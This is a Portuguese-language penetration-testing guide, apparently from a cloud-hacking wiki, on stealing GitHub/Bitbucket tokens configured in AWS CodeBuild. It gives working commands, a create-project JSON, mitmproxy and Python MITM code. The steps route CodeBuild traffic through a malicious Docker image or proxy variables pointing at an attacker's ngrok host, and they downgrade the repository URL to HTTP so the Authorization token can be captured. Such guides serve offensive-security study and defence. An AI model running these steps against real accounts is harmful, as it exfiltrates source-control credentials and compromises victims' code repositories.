AWS Codebuild - Token Leakage

Recuperar Tokens Configurados no Github/Bitbucket

Primeiro, verifique se há alguma credencial de origem configurada que você possa leak:

aws codebuild list-source-credentials

Via Docker Image

Se você descobrir que a autenticação para, por exemplo, Github está configurada na conta, você pode exfiltrar esse acesso (token GH ou token OAuth) fazendo com que o Codebuild use uma imagem Docker específica para executar a build do projeto.

Para esse propósito, você pode criar um novo projeto Codebuild ou alterar o ambiente de um existente para definir a imagem Docker.

A imagem Docker que você pode usar é https://github.com/carlospolop/docker-mitm. Esta é uma imagem Docker muito básica que definirá as variáveis de ambiente https_proxy, http_proxy e SSL_CERT_FILE. Isso permitirá que você intercepte a maior parte do tráfego do host indicado em https_proxy e http_proxy e confie no CERT SSL indicado em SSL_CERT_FILE.

1. Crie e faça upload da sua própria imagem Docker MitM

• Siga as instruções do repositório para definir o endereço IP do seu proxy e definir seu certificado SSL e construir a imagem docker.

• NÃO DEFINA http_proxy para não interceptar solicitações para o endpoint de metadados.

• Você pode usar ngrok como ngrok tcp 4444 para definir o proxy para o seu host.

• Uma vez que você tenha construído a imagem Docker, faça upload para um repositório público (Dockerhub, ECR...)

2. Defina o ambiente

• Crie um novo projeto Codebuild ou modifique o ambiente de um existente.

• Defina o projeto para usar a imagem Docker gerada anteriormente.

3. Defina o proxy MitM no seu host

• Conforme indicado no repositório Github, você pode usar algo como:

mitmproxy --listen-port 4444  --allow-hosts "github.com"

4. Execute a build e capture as credenciais

• Você pode ver o token no cabeçalho Authorization:

Isso também pode ser feito a partir do aws cli com algo como

# Create project using a Github connection
aws codebuild create-project --cli-input-json file:///tmp/buildspec.json

## With /tmp/buildspec.json
{
"name": "my-demo-project",
"source": {
"type": "GITHUB",
"location": "https://github.com/uname/repo",
"buildspec": "buildspec.yml"
},
"artifacts": {
"type": "NO_ARTIFACTS"
},
"environment": {
"type": "LINUX_CONTAINER", // Use "ARM_CONTAINER" to run docker-mitm ARM
"image": "docker.io/carlospolop/docker-mitm:v12",
"computeType": "BUILD_GENERAL1_SMALL",
"imagePullCredentialsType": "CODEBUILD"
}
}

## Json

# Start the build
aws codebuild start-build --project-name my-project2

Via HTTP protocol

Um atacante com permissões elevadas sobre um CodeBuild poderia vazar o token do Github/Bitbucket configurado ou, se as permissões foram configuradas via OAuth, o token OAuth temporário usado para acessar o código.

• Um atacante poderia adicionar as variáveis de ambiente http_proxy e https_proxy ao projeto CodeBuild apontando para sua máquina (por exemplo http://5.tcp.eu.ngrok.io:14972).

• Em seguida, altere a URL do repositório github para usar HTTP em vez de HTTPS, por exemplo: **http://**github.com/carlospolop-forks/TestActions

• Depois, execute o exemplo básico de https://github.com/synchronizing/mitm na porta apontada pelas variáveis de proxy (http_proxy e https_proxy)

from mitm import MITM, protocol, middleware, crypto

mitm = MITM(
host="127.0.0.1",
port=4444,
protocols=[protocol.HTTP],
middlewares=[middleware.Log], # middleware.HTTPLog used for the example below.
certificate_authority = crypto.CertificateAuthority()
)
mitm.run()

• Finalmente, clique em Build the project, as credenciais serão enviadas em texto claro (base64) para a porta mitm: